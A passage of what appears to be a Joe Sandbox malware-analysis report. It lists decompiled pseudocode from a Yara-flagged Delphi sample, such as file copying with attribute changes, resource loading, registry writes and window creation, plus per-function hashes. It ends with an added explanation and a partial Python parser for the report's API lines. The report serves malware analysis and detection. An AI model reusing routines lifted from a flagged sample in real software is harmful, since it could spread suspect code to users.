                                                    				void* _t29;
                                                    				intOrPtr* _t33;
                                                    				struct HINSTANCE__* _t37;
                                                    				void* _t38;
                                                    				intOrPtr _t41;
                                                    				void* _t48;
                                                    				intOrPtr _t51;
                                                    
                                                    				_t48 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				_push(_t51);
                                                    				_push(0x474878);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t51;
                                                    				_t11 = E00404E80(_v8);
                                                    				_t12 =  *0x49e668; // 0x400000
                                                    				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
                                                    				if(_t13 == 0) {
                                                    					E00404A14(_t48, 0x47488c);
                                                    				} else {
                                                    					_t37 =  *0x49e668; // 0x400000
                                                    					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
                                                    					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
                                                    					_push( *((intOrPtr*)( *_t33))());
                                                    					_t29 = E00404ED8(_t48);
                                                    					_pop(_t38);
                                                    					E0041D8CC(_t33, _t38, _t29);
                                                    				}
                                                    				_pop(_t41);
                                                    				 *[fs:eax] = _t41;
                                                    				_push(0x47487f);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                    • Opcode Fuzzy Hash: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				intOrPtr _t51;
                                                    				void* _t56;
                                                    				void* _t59;
                                                    				void* _t61;
                                                    
                                                    				_t61 = __eflags;
                                                    				_v20 = 0;
                                                    				_v16 = 0;
                                                    				_t56 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t59);
                                                    				_push(0x4738af);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t59 + 0xfffffff0;
                                                    				if(E00409A48(_v12, _t61) != 0) {
                                                    					E00404BB8( &_v16, E00404E80(_v12));
                                                    					E00409A90(_v16, 0x80);
                                                    				}
                                                    				_t44 = E00404E80(_v12);
                                                    				CopyFileA(E00404E80(_v8), _t25, 0); // executed
                                                    				E00404BB8( &_v20, _t44);
                                                    				E00409A90(_v20, _t56);
                                                    				_pop(_t51);
                                                    				 *[fs:eax] = _t51;
                                                    				_push(0x4738b6);
                                                    				return E004049E4( &_v20, 4);
                                                    			}

                                                    APIs
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$AttributesCopyErrorLast
                                                    • String ID:
                                                    • API String ID: 2414470624-0
                                                    • Opcode ID: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                    • Opcode Fuzzy Hash: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 65%
                                                    			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
                                                    				intOrPtr _v8;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t10;
                                                    				intOrPtr _t15;
                                                    				struct HINSTANCE__* _t20;
                                                    				intOrPtr* _t22;
                                                    				intOrPtr _t30;
                                                    				void* _t32;
                                                    				intOrPtr* _t35;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t40;
                                                    
                                                    				_t38 = _t40;
                                                    				_push(_t22);
                                                    				_t35 = _t22;
                                                    				_t20 = __edx;
                                                    				_t32 = __eax;
                                                    				if(__edx == 0) {
                                                    					_t20 =  *0x49e668; // 0x400000
                                                    				}
                                                    				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
                                                    				_t43 = _t10;
                                                    				if(_t10 == 0) {
                                                    					return _t10;
                                                    				} else {
                                                    					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
                                                    					_push(_t38);
                                                    					_push(0x41a890);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t40;
                                                    					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
                                                    					 *_t35 = _t15;
                                                    					_pop(_t30);
                                                    					 *[fs:eax] = _t30;
                                                    					_push(E0041A897);
                                                    					return E00403BEC(_v8);
                                                    				}
                                                    			}

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                    • Opcode Fuzzy Hash: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00407A8A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                    				CHAR* _v8;
                                                    				void* _t13;
                                                    				struct HWND__* _t24;
                                                    				CHAR* _t31;
                                                    				long _t38;
                                                    
                                                    				_push(_t31);
                                                    				_v8 = _t31;
                                                    				_t38 = __eax;
                                                    				_t13 = E00402C0C();
                                                    				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                    				E00402BFC(_t13);
                                                    				return _t24;
                                                    			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                    • Instruction ID: a8a80a8af59d526015255caeaaeb12d1c6418dce9794d9929da9e8c0ec6d85c8
                                                    • Opcode Fuzzy Hash: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                    • Instruction Fuzzy Hash: 1BF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E0045A28C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                    				char _v8;
                                                    				void* _t27;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t40;
                                                    				char _t41;
                                                    
                                                    				_push(0);
                                                    				_t37 = __edx;
                                                    				_t27 = __eax;
                                                    				_push(_t40);
                                                    				_push(0x45a30e);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t40;
                                                    				_t41 =  *((char*)(__eax + 0xa4));
                                                    				if(_t41 == 0) {
                                                    					_t7 = _t27 + 0x8c; // 0x8c
                                                    					E00404A14(_t7, __edx);
                                                    				} else {
                                                    					E0045A240(__eax,  &_v8);
                                                    					E00404DCC(_v8, _t37);
                                                    					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
                                                    						SetWindowTextA( *(_t27 + 0x30), E00404E80(_t37));
                                                    						_t6 = _t27 + 0x8c; // 0x8c
                                                    						E004049C0(_t6);
                                                    					}
                                                    				}
                                                    				_pop(_t33);
                                                    				 *[fs:eax] = _t33;
                                                    				_push(E0045A315);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                      • Part of subcall function 0045A240: GetWindowTextA.USER32 ref: 0045A263
                                                    • SetWindowTextA.USER32(?,00000000), ref: 0045A2D9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID:
                                                    • API String ID: 530164218-0
                                                    • Opcode ID: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction ID: 29e0112d14c0054e859a686d8a752fc0bc116d16f21071392ac3c9ea7363cd22
                                                    • Opcode Fuzzy Hash: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction Fuzzy Hash: E001D4B06006049BD701EB65C842B5A72A8AB88704F5042B7FD0497383D63C9D59866E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                    				CHAR* _v8;
                                                    				void* _t13;
                                                    				struct HWND__* _t24;
                                                    				CHAR* _t29;
                                                    				long _t32;
                                                    
                                                    				_v8 = _t29;
                                                    				_t32 = __eax;
                                                    				_t13 = E00402C0C();
                                                    				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                    				E00402BFC(_t13);
                                                    				return _t24;
			}

Statement addresses (disassembly column): 0x00407a93 0x00407a98 0x00407a9a 0x00407acb 0x00407ad4 0x00407ae0

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                    • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                    				long _v8;
                                                    				void* _t12;
                                                    				struct HWND__* _t22;
                                                    				long _t27;
                                                    				CHAR* _t30;
                                                    
                                                    				_v8 = _t27;
                                                    				_t30 = __eax;
                                                    				_t12 = E00402C0C();
                                                    				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                    				E00402BFC(_t12);
                                                    				return _t22;
			}

Statement addresses (disassembly column): 0x00407aeb 0x00407af0 0x00407af2 0x00407b21 0x00407b2a 0x00407b36

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                    • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00432310(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                                                    				char* _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				int _t11;
                                                    				long _t17;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    				intOrPtr _t23;
                                                    				char _t26;
                                                    
                                                    				_v8 = __ecx;
                                                    				_t26 = __edx;
                                                    				_t21 = __eax;
                                                    				_t11 = E00431D9C(_a4);
                                                    				_t27 = _t11;
                                                    				_t17 = RegSetValueExA( *(_t21 + 4), E00404E80(__edx), 0, _t11, _v8, _a8); // executed
                                                    				if(_t17 != 0) {
                                                    					_v16 = _t26;
                                                    					_v12 = 0xb;
                                                    					_t23 =  *0x49daf4; // 0x417504
                                                    					_t20 = E0040D23C(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
                                                    					E00404378();
                                                    					return _t20;
                                                    				}
                                                    				return _t17;
			}

Statement addresses (disassembly column): 0x00432319 0x0043231c 0x0043231e 0x00432323 0x00432328 0x00432341 0x00432348 0x0043234a 0x0043234d 0x00432357 0x00432364 0x00432369 0x00000000 0x00432369 0x00432374

                                                    APIs
                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00432341
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction ID: 39d1438e57032ee4bbe9f28f00567530b1aebd0f65b6a02640603f55bb4cbe43
                                                    • Opcode Fuzzy Hash: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction Fuzzy Hash: 47F0A471A001087BD700EBAEDC81EAFB7EC9B49314F0040BAFA18E7391DA749D0087A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E0043EAF8(intOrPtr __eax) {
                                                    				intOrPtr _v8;
                                                    				void* __ecx;
                                                    				intOrPtr _t14;
                                                    				intOrPtr _t16;
                                                    				void* _t18;
                                                    				void* _t19;
                                                    				intOrPtr _t22;
                                                    				void* _t23;
                                                    				void* _t24;
                                                    				intOrPtr _t27;
                                                    
                                                    				_push(_t19);
                                                    				_v8 = __eax;
                                                    				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
                                                    				_push(_t27);
                                                    				_push(0x43eb45);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t27;
                                                    				_t14 =  *((intOrPtr*)(_v8 + 0x180));
                                                    				_push(_t14); // executed
                                                    				L00407568(); // executed
                                                    				if(_t14 == 0) {
                                                    					E0040E79C(_t18, _t19, _t23, _t24);
                                                    				}
                                                    				_pop(_t22);
                                                    				 *[fs:eax] = _t22;
                                                    				_push(0x43eb4c);
                                                    				_t16 = _v8;
                                                    				 *(_t16 + 0x54) =  *(_t16 + 0x54) & 0x0000fdff;
                                                    				return _t16;
			}

Statement addresses (disassembly column): 0x0043eafb 0x0043eafc 0x0043eb02 0x0043eb0a 0x0043eb0b 0x0043eb10 0x0043eb13 0x0043eb19 0x0043eb1f 0x0043eb20 0x0043eb27 0x0043eb29 0x0043eb29 0x0043eb30 0x0043eb33 0x0043eb36 0x0043eb3b 0x0043eb3e 0x0043eb44

                                                    APIs
                                                    • 733B9840.USER32(?,00000000,0043EB45), ref: 0043EB20
                                                      • Part of subcall function 0040E79C: GetLastError.KERNEL32(00000000,0040E82C), ref: 0040E7B6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B9840ErrorLast
                                                    • String ID:
                                                    • API String ID: 2743046405-0
                                                    • Opcode ID: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction ID: c963e65f66f93bc950c3b922f0db45755e41eff8f234a4ebd21f449329ecdab1
                                                    • Opcode Fuzzy Hash: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction Fuzzy Hash: 4EF03031615704EFEB16CB6ACA56D59F7E8EB0C710B6204BAF900D7691E638BD10DA18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
                                                    				int _t9;
                                                    				int _t13;
                                                    				void* _t14;
                                                    				intOrPtr _t17;
                                                    
                                                    				_t14 = __eax;
                                                    				_t17 =  *0x425ac4; // 0x3
                                                    				E00425D3C(__eax, __ecx, _t17);
                                                    				 *__ecx = 0;
                                                    				__ecx->cy = 0;
                                                    				_t9 = E00404C80(__edx);
                                                    				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
                                                    				return _t13;
			}

Statement addresses (disassembly column): 0x00425a8b 0x00425a8d 0x00425a95 0x00425a9c 0x00425aa0 0x00425aa6 0x00425ab8 0x00425ac0

                                                    APIs
                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExtentPoint32Text
                                                    • String ID:
                                                    • API String ID: 223599850-0
                                                    • Opcode ID: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                    • Opcode Fuzzy Hash: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00405F94(void* __eax) {
                                                    				char _v272;
                                                    				intOrPtr _t14;
                                                    				void* _t16;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t19;
                                                    
                                                    				_t16 = __eax;
                                                    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
                                                    					_t14 = E004061D0(_t19); // executed
                                                    					_t18 = _t14;
                                                    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                    					if(_t18 == 0) {
                                                    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                    					}
                                                    				}
                                                    				return  *((intOrPtr*)(_t16 + 0x10));
			}

Statement addresses (disassembly column): 0x00405f9c 0x00405fa2 0x00405fb2 0x00405fbb 0x00405fc0 0x00405fc2 0x00405fc7 0x00405fcc 0x00405fcc 0x00405fc7 0x00405fda

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                      • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                      • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                    • String ID:
                                                    • API String ID: 2796650324-0
                                                    • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                    • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
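The "APIs" lists in these entries are read more easily as records than as bullets, and two things in them deserve a flag when triaging a report of this size: an API printed as a raw address instead of a name (the "733B9840.USER32" entry above is an import the decompiler could not resolve), and the Software\Borland\Locales registry probes, which are the Delphi runtime's lookup for a locale resource DLL rather than behaviour specific to this sample. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses API lines of the shape used on this page into records and applies both checks to an excerpt copied from the E00405F94 and E0043EAF8 entries above. The record and function names, and the "Delphi locale lookup" label for those registry keys, are this example's own choices.

```python
# Added example, not part of the Joe Sandbox report or of the analysed sample:
# parse the per-function "APIs" lists of a report like the one above into records,
# then flag unresolved imports (printed by the report as an 8-hex-digit address in
# place of the API name) and the Delphi VCL locale lookup recognisable by its
# Software\Borland\Locales registry probes. Record names and the Delphi heuristic
# are this example's own choices; the line shapes follow this report.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HEX8 = r"[0-9A-Fa-f]{8}"
# "• API.MODULE(arg,...), ref: ADDR", optionally prefixed with
# "Part of subcall function CALLER: " for calls made inside a callee.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<caller>" + HEX8 + r"):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*?)\),\s*ref:\s*(?P<ref>" + HEX8 + r")\s*$"
)
FUNC_LINE = re.compile(r"^\s*(?P<name>E" + HEX8 + r")\(.*\{\s*$")  # "E00405F94(...) {"
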